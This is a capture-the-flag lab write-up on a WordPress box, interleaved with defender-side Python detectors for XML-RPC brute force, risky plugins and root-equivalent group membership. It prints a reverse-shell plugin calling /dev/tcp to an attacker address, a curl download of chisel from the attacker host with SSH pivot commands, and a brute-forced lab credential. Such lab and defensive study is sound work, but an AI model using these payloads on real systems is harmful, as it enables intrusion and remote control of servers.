For Business Reasons

WordPress Enumeration - Docker Escape by Pivoting - LXD Privilege Escalation

Scanning

Nmap scan results

# Nmap 7.94 scan initiated Fri Jun 30 15:03:29 2023 as: nmap -p 80 -vvv -T4 -sCV -A -oN nmap.log 10.10.6.91
Nmap scan report for 10.10.6.91
Host is up, received syn-ack (0.23s latency).
Scanned at 2023-06-30 15:03:30 IST for 30s

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))
|_http-title: MilkCo Test/POC site – Just another WordPress site
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: 000BF649CC8F6BF27CFB04D1BCDCD3C7
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 30 15:04:00 2023 -- 1 IP address (1 host up) scanned in 30.77 seconds

Enumeration

$ wpscan --url http://10.10.10.x -U sysadmin -P /opt/rockyou.txt
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.6.91/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.6.91/, Match: 'WordPress 5.4.2'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:37 <==============================================================================> (137 / 137) 100.00% Time: 00:00:37

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - sysadmin / milkshake                                                                                                                             
Trying sysadmin / rachael Time: 00:07:19 <                                                                          > (1665 / 14346057)  0.01%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: sysadmin, Password: milkshake
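
As an added example from the defender's side (not part of the original writeup), here is what the XML-RPC password attack shown above looks like in the web server's own logs: a Python function that parses Apache combined-format lines and flags clients that hammer /xmlrpc.php or announce a WPScan user agent. The log lines are constructed for the example (RFC 5737 documentation addresses, not hosts from this box); the regex, threshold and function names are my choices.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format, e.g.
# 203.0.113.10 - - [30/Jun/2023:15:10:01 +0530] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "WPScan v3.8.22"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_xmlrpc_bruteforce(log_text, threshold=5):
    """Flag clients POSTing to /xmlrpc.php.

    Returns {ip: {"posts": n, "scanner_ua": bool}} for every client that sent at
    least `threshold` POSTs to /xmlrpc.php or that identifies itself as WPScan.
    The threshold is deliberately low: XML-RPC's system.multicall lets a single
    request carry many login guesses, so a handful of POSTs can already be a
    complete brute-force run.
    """
    posts = Counter()
    scanner = defaultdict(bool)
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] == "/xmlrpc.php":
            posts[rec["ip"]] += 1
            if "wpscan" in rec["ua"].lower():
                scanner[rec["ip"]] = True
    return {
        ip: {"posts": n, "scanner_ua": scanner[ip]}
        for ip, n in posts.items()
        if n >= threshold or scanner[ip]
    }


def _line(ip, method, path, ua, second):
    # Helper that builds a constructed sample line (documentation-range IPs,
    # not hosts from the original writeup).
    return (f'{ip} - - [30/Jun/2023:15:10:{second:02d} +0530] "{method} {path} HTTP/1.1" '
            f'200 403 "-" "{ua}"')


SCANNER_UA = "WPScan v3.8.22 (https://wpscan.com/wordpress-security-scanner)"
# Constructed sample: a scanner burst from one client, two XML-RPC pings with a
# Jetpack-style UA from another (normal for a site using Jetpack), and one page view.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.10", "POST", "/xmlrpc.php", SCANNER_UA, i) for i in range(8)]
    + [_line("198.51.100.7", "POST", "/xmlrpc.php", "Jetpack by WordPress.com", 20 + i) for i in range(2)]
    + [_line("198.51.100.7", "GET", "/index.php", "Mozilla/5.0", 30)]
)

if __name__ == "__main__":
    for ip, info in detect_xmlrpc_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['posts']} XML-RPC POSTs, scanner UA: {info['scanner_ua']}")
```

Only the 203.0.113.10 client is reported; the two Jetpack-style posts stay under the threshold and carry no scanner UA. Counting by client and by user agent separately matters because a patient attacker can drop the UA but not the request volume, and a noisy one can spread volume but rarely bothers to change the UA.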

One option: with these credentials, place a reverse shell in the 404.php template of the installed theme (twentynineteen in this case).

Or we can upload a malicious plugin of our own:

<?php

/**
* Plugin Name: Reverse Shell
* Plugin URI:
* Description: Reverse Shell
* Version: 1.0
* Author: Richard OBZ
* Author URI: https://onlineblogzone.com/
*/

exec("/bin/bash -c 'bash -i > /dev/tcp/<attack_ip>/9001 0>&1'");
?>

Now zip this file and upload it by browsing to Plugins and then Add New in the WordPress dashboard.

Meanwhile, start a listener on port 9001; once the zip is uploaded and the plugin activated, we get a shell!
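
As an added defender-side example (not code from the writeup, nor from WordPress itself), here are the two controls that blunt the plugin trick above: a check that wp-config.php defines DISALLOW_FILE_MODS as true, which removes the plugin/theme installer and the file editor from the dashboard, and an audit that walks wp-content/plugins for PHP files calling command-execution functions or opening raw sockets. The sample plugin tree is built in a temporary directory for the demonstration; the function names and the list of flagged calls are my choices.

```python
import os
import re
import tempfile

# PHP functions that hand strings to the OS or back to the interpreter; a plugin
# that uses any of them deserves a manual look.
DANGEROUS_CALLS = ("exec", "shell_exec", "system", "passthru", "popen", "proc_open", "eval")
CALL_RE = re.compile(r"\b(" + "|".join(DANGEROUS_CALLS) + r")\s*\(", re.IGNORECASE)
# Raw network sinks: bash's /dev/tcp pseudo-device or a direct socket open.
NET_RE = re.compile(r"/dev/tcp/|\bfsockopen\s*\(", re.IGNORECASE)
FILE_MODS_RE = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*true\s*\)", re.IGNORECASE
)


def file_mods_disallowed(wp_config_src):
    """True when wp-config.php disables plugin/theme installation and the editor.
    Comments are stripped first so a commented-out define does not count."""
    src = re.sub(r"/\*.*?\*/", "", wp_config_src, flags=re.S)
    src = re.sub(r"(?m)(//|#).*$", "", src)
    return bool(FILE_MODS_RE.search(src))


def audit_plugin_dir(root):
    """Walk a wp-content/plugins tree; return {relative_path: [findings]} for PHP
    files that call command-execution functions or open raw network sinks."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml")):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            hits = sorted({m.group(1).lower() for m in CALL_RE.finditer(src)})
            if NET_RE.search(src):
                hits.append("raw-socket")
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def build_sample_tree():
    """Create a constructed plugins tree in a temp dir and return its path:
    one harmless plugin and one that mirrors the reverse-shell plugin above."""
    root = tempfile.mkdtemp(prefix="plugins-")
    os.makedirs(os.path.join(root, "hello"))
    with open(os.path.join(root, "hello", "hello.php"), "w") as fh:
        fh.write("<?php\n/* Plugin Name: Hello */\n"
                 "add_action('init', function () { echo 'hello'; });\n")
    os.makedirs(os.path.join(root, "revshell"))
    with open(os.path.join(root, "revshell", "revshell.php"), "w") as fh:
        fh.write("<?php\n/* Plugin Name: Reverse Shell */\n"
                 "exec(\"/bin/bash -c 'bash -i > /dev/tcp/<attack_ip>/9001 0>&1'\");\n")
    return root


if __name__ == "__main__":
    print("file mods blocked:", file_mods_disallowed("define('DISALLOW_FILE_MODS', true);"))
    for path, hits in audit_plugin_dir(build_sample_tree()).items():
        print(f"{path}: {', '.join(hits)}")
```

The audit is a triage aid, not a verdict: a match on system( or eval( in a large legitimate plugin still needs a human to read the surrounding code, and an attacker can obfuscate calls past a regex. DISALLOW_FILE_MODS is the stronger control because it denies the upload path entirely, which is why it belongs in wp-config.php on any site whose plugins are deployed some other way.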

Initial foothold

In the current directory we find a script which shows that we are inside a Docker container.

  • The content of start_container.sh is

#!/bin/sh
cd /data
exec 2>&1 1> /data/start.log

myip=$(ip route | grep -v docker | grep src  | awk '{print $9}')

sed -e 's-define("WP_HOME","http://.*");-define("WP_HOME","http://${myip}");-' -i /data/wp-config.php
sed -e 's-define("WP_SITEURL","http://.*");-define("WP_SITEURL","http://${myip}");-' -i /data/wp-config.php

#docker stack rm wordpress
#sleep 10 
#docker stack rm wordpress
#sleep 10 

cd /data
docker stack deploy wordpress -c wordpress_stack.yml
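
The awk pipeline in the script above picks the ninth word of every `src` line of `ip route` to find the host address. As an added example (my code, not the box's script), here is a small parser for `ip route` output that extracts the same information by key instead of by position, and also returns the default gateway, which is the address the pivot later in this writeup goes through. The sample routing table is constructed for the example.

```python
# Tokens that appear on their own in `ip route` output, with no value after them.
FLAG_TOKENS = {"linkdown", "onlink", "dead", "pervasive", "offload", "trap"}


def parse_ip_route(text):
    """Parse `ip route` output into a list of dicts, one per route.

    The first token is the destination ("default" or a prefix); the rest are
    key/value pairs (via, dev, proto, scope, src, metric, ...) plus bare flags.
    """
    routes = []
    for line in text.splitlines():
        toks = line.split()
        if not toks:
            continue
        route = {"dst": toks[0], "flags": []}
        i = 1
        while i < len(toks):
            if toks[i] in FLAG_TOKENS:
                route["flags"].append(toks[i])
                i += 1
            elif i + 1 < len(toks):
                route[toks[i]] = toks[i + 1]
                i += 2
            else:  # dangling token: skip it rather than fail on odd output
                i += 1
        routes.append(route)
    return routes


def default_gateway(routes):
    """Return (gateway_ip, device) from the default route, or None."""
    for r in routes:
        if r["dst"] == "default" and "via" in r:
            return r["via"], r.get("dev")
    return None


def source_addresses(routes, skip_dev_prefix="docker"):
    """Local addresses named by `src` on connected routes, in output order,
    skipping interfaces whose name starts with `skip_dev_prefix` (None keeps all).
    This is what `ip route | grep -v docker | grep src | awk '{print $9}'` tries
    to do, without assuming the address is always the ninth word."""
    out = []
    for r in routes:
        if "src" not in r:
            continue
        if skip_dev_prefix and r.get("dev", "").startswith(skip_dev_prefix):
            continue
        out.append(r["src"])
    return out


# Constructed sample (not captured from the box): two interfaces plus an idle
# docker0 bridge, with a default route through the 172.18.0.1 gateway.
SAMPLE_IP_ROUTE = """\
default via 172.18.0.1 dev eth0
10.0.0.0/24 dev eth1 proto kernel scope link src 10.0.0.5
172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
"""

if __name__ == "__main__":
    routes = parse_ip_route(SAMPLE_IP_ROUTE)
    print("gateway:", default_gateway(routes))
    print("local addresses:", source_addresses(routes))
```

The same parser runs unchanged on a machine's real output (`subprocess.run(["ip", "route"], capture_output=True, text=True).stdout`); the point of parsing by key is that `metric`, `linkdown` or a `via` on a connected route would silently shift the column the awk one-liner reads.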

This confirms that we are inside a Docker container. To escape it we first have to figure out our IP addresses, which hostname -I gives us:

10.255.0.4 172.18.0.4 10.0.0.5

So our internal IP address is 172.18.0.4; we can now scan that network with netcat.

Port 22 turns out to be open on 172.18.0.1, the bridge gateway, i.e. the Docker host itself.

  • Let's use chisel to forward that port back to the attacking machine.

On the attacking machine
$ python3 -m http.server
$ chisel server -p 1337 --reverse

Inside the container
$ curl http://<attacker_ip>:8000/chisel -o chisel
$ chmod +x chisel
$ ./chisel client 10.8.74.51:1337 R:22:172.18.0.1:22

Once the client connects, the reverse forward binds port 22 on the attacking machine and relays it to 172.18.0.1:22, so we can log in to the host's SSH server through it with the same credentials:

$ ssh sysadmin@127.0.0.1

Privilege Escalation

Since the sysadmin user is a member of the lxd group, we can craft our own Alpine image and escalate our privileges :)
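
As an added defender-side example (not part of the original writeup), here is a small audit of /etc/group and /etc/passwd that lists every user sitting in a group that is effectively root-equivalent, lxd and docker among them, whether through supplementary membership or through the primary GID in /etc/passwd, which a plain `grep lxd /etc/group` misses. The group and passwd contents are constructed samples; the set of flagged groups and the function names are my choices.

```python
# Groups whose membership is, in practice, root on a stock Linux host.  The
# reasons are what an auditor would put in the finding.
ROOT_EQUIVALENT_GROUPS = {
    "lxd": "can launch containers that mount the host filesystem",
    "docker": "can mount the host filesystem into a privileged container",
    "sudo": "sudo access (Debian/Ubuntu)",
    "wheel": "sudo access (RHEL/Arch)",
    "disk": "raw read/write on block devices",
}


def parse_group_file(text):
    """Parse /etc/group content into {name: {"gid": str, "members": set}}."""
    groups = {}
    for line in text.splitlines():
        if line.startswith("#"):
            continue
        parts = line.strip().split(":")
        if len(parts) != 4:
            continue
        name, _pw, gid, members = parts
        groups[name] = {"gid": gid, "members": {m for m in members.split(",") if m}}
    return groups


def risky_memberships(group_text, passwd_text=""):
    """Return {user: [group, ...]} for users in root-equivalent groups.

    Supplementary members come from /etc/group; if passwd_text is given, a
    user whose primary GID maps to such a group is reported as well.
    """
    groups = parse_group_file(group_text)
    by_gid = {g["gid"]: name for name, g in groups.items()}
    found = {}
    for name, g in groups.items():
        if name in ROOT_EQUIVALENT_GROUPS:
            for user in g["members"]:
                found.setdefault(user, set()).add(name)
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        user, gid = parts[0], parts[3]
        gname = by_gid.get(gid)
        if gname in ROOT_EQUIVALENT_GROUPS:
            found.setdefault(user, set()).add(gname)
    return {u: sorted(gs) for u, gs in sorted(found.items())}


# Constructed samples, not the files from the box.  bob is only caught via
# his primary GID (998 = docker) in passwd.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:alice
disk:x:6:
docker:x:998:
lxd:x:997:sysadmin,alice
users:x:100:
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
sysadmin:x:1001:1001::/home/sysadmin:/bin/bash
bob:x:1002:998::/home/bob:/bin/bash
"""

if __name__ == "__main__":
    for user, groups in risky_memberships(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        reasons = "; ".join(f"{g}: {ROOT_EQUIVALENT_GROUPS[g]}" for g in groups)
        print(f"{user}: {reasons}")
```

To run it against a live host, read the two files in (`open("/etc/group").read()`, `open("/etc/passwd").read()`) and pass the strings; every user it prints should be treated as having root, so membership in lxd or docker should be granted as deliberately as a sudoers entry.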
